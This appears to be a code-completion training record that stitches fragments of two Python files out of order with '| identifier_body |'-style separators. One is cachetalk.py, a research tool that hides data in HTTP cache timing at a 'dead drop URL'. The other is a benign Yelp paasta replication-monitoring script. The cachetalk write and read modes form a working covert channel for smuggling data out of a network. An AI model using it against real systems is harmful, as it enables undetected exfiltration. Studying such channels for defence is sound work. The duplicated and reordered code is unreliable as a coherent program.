#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
|
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happens when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read: append a bit to the bits array depending on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write: pop a bit from the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits | identifier_body |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
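# Illustrative sketch (header values made up, not part of the original tool): __calc_delta()
# turns the HTTP 'Expires' and 'Date' headers into a timedelta, e.g.:
#
#   __calc_delta('Sat, 05 Mar 2016 12:01:30 GMT', 'Sat, 05 Mar 2016 12:00:30 GMT')
#   # -> datetime.timedelta(0, 60), i.e. the cached copy expires 60 seconds after 'Date'
#
# The reader below treats a delta smaller than the agreed poll interval as bit 1 and a
# full-sized delta as bit 0.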
def | (string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary: hexlify the string, parse it as an int, take bin(), list() the result, and skip the first 2 characters to drop the '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# The list is reversed because the caller consumes bits with .pop(), which takes from the end
bits.reverse()
return bits
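# Quick sketch of what the helper above returns (hand-checked, but still only an illustration):
#
#   __str2bits('0b110')  # -> ['0', '1', '1']  (already a bit string; reversed so .pop() yields bits in order)
#   __str2bits('Hi')     # hexlify('Hi') == '4869', bin(0x4869) == '0b100100001101001',
#                        # so the result is that bit string as a reversed list of '0'/'1' characters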
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happens when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read: append a bit to the bits array depending on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write: pop a bit from the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| __str2bits | identifier_name |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# instance_config.job_id is expected to be a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
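# Hypothetical usage of the helper above (instance_config would be a MarathonServiceConfig
# loaded elsewhere; the output string is made up):
#
#   send_event(instance_config, pysensu_yelp.Status.OK,
#              'Service mumble.main has 3 out of 3 expected instances available!')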
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
|
send_event(instance_config=instance_config, status=status, output=output)
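# Sketch of the data shape consumed above (assumed from how it is indexed; names illustrative):
#
#   smartstack_replication_info == {
#       'uswest1-prod': {'mumble.main': 4},
#       'uswest2-prod': {'mumble.main': 1},
#   }
#
# i.e. a mapping of location -> {registration: number of available backends}.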
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
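# Routing sketch for the decision above (names are illustrative): an instance whose primary
# registration equals its job_id, e.g. service 'mumble' / instance 'main' registered as
# 'mumble.main' with a proxy_port configured, is checked against Synapse/HAProxy backends;
# anything else (no proxy_port, or a mismatched registration) falls back to counting healthy
# Marathon tasks only.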
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output) | conditional_block |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# instance_config.job_id is expected to be a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
